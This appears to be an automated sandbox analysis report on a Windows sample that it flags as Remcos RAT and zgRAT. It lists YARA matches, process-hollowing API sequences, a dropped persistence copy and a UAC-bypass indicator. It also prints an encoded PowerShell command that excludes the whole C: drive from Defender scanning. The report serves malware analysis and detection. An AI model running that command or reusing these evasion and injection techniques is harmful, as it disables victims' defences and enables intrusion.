          Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Matched YARA rules (rule metadata is listed once here; the entries below name the rule only):
INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer: author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
REMCOS_RAT_variants: Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
MALWARE_Win_zgRAT: author = ditekSHen, description = Detects zgRAT

Source: 28.0.InstallUtil.exe.400000.2.unpack | Type: UNPACKEDPE | Matched rules: REMCOS_RAT_variants
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack | Type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack | Type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack | Type: UNPACKEDPE | Matched rules: MALWARE_Win_zgRAT
Source: 26.0.InstallUtil.exe.400000.4.unpack | Type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 26.0.InstallUtil.exe.400000.3.unpack | Type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack | Type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 28.0.InstallUtil.exe.400000.8.unpack | Type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack | Type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack | Type: UNPACKEDPE | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp | Type: MEMORY | Matched rules: MALWARE_Win_zgRAT
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp | Type: MEMORY | Matched rules: MALWARE_Win_zgRAT
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp | Type: MEMORY | Matched rules: MALWARE_Win_zgRAT
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Type: MEMORY | Matched rules: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; REMCOS_RAT_variants
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 004310BE appears 38 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 00402053 appears 50 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 00431740 appears 53 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_00414EA8 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,17_2_00414EA8
          Source: kyFBQxVbsg.exe, 00000000.00000002.540743790.0000000003687000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
          Source: kyFBQxVbsg.exe, 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
          Source: kyFBQxVbsg.exe, 00000000.00000000.371796335.0000000000392000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe
          Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
          Source: kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
          Source: kyFBQxVbsg.exeBinary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe
          Source: kyFBQxVbsg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Qerdo.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: kyFBQxVbsg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | File created: C:\Users\user\AppData\Roaming\Ppjollp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@18/10@117/1
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_004172C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00417CBB FindResourceA,LoadResource,LockResource,SizeofResource,17_2_00417CBB
Source: kyFBQxVbsg.exe | Virustotal: Detection: 46%
Source: kyFBQxVbsg.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | File read: C:\Users\user\Desktop\kyFBQxVbsg.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\kyFBQxVbsg.exe "C:\Users\user\Desktop\kyFBQxVbsg.exe"
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00414706 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00414706
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esjq1xkt.ffx.ps1
Source: kyFBQxVbsg.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040D3C8 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,17_2_0040D3C8
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: \Sessions\1\BaseNamedObjects\cvxyttydfsgbghfgfhtd-RXTSAM
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: kyFBQxVbsg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: kyFBQxVbsg.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

Source: Yara match | File source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.587908821.0000000004060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.581326592.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: kyFBQxVbsg.exe, hlrc.cs | .Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrc.cs | .Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | Code function: 0_2_024A2827 push ebx; ret 0_2_024A287A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00C8FF5F push es; ret 3_2_00C8FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_004594FD push esi; ret 17_2_00459506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00431786 push ecx; ret 17_2_00431799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00453798 push eax; ret 17_2_004537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00452E76 push ecx; ret 17_2_00452E89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_0040CE58 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0040CE58
Source: initial sample | Static PE information: section name: .text entropy: 7.9984009418791
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe | File created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 17_2_00405CE1 ShellExecuteW,URLDownloadToFileW,17_2_00405CE1
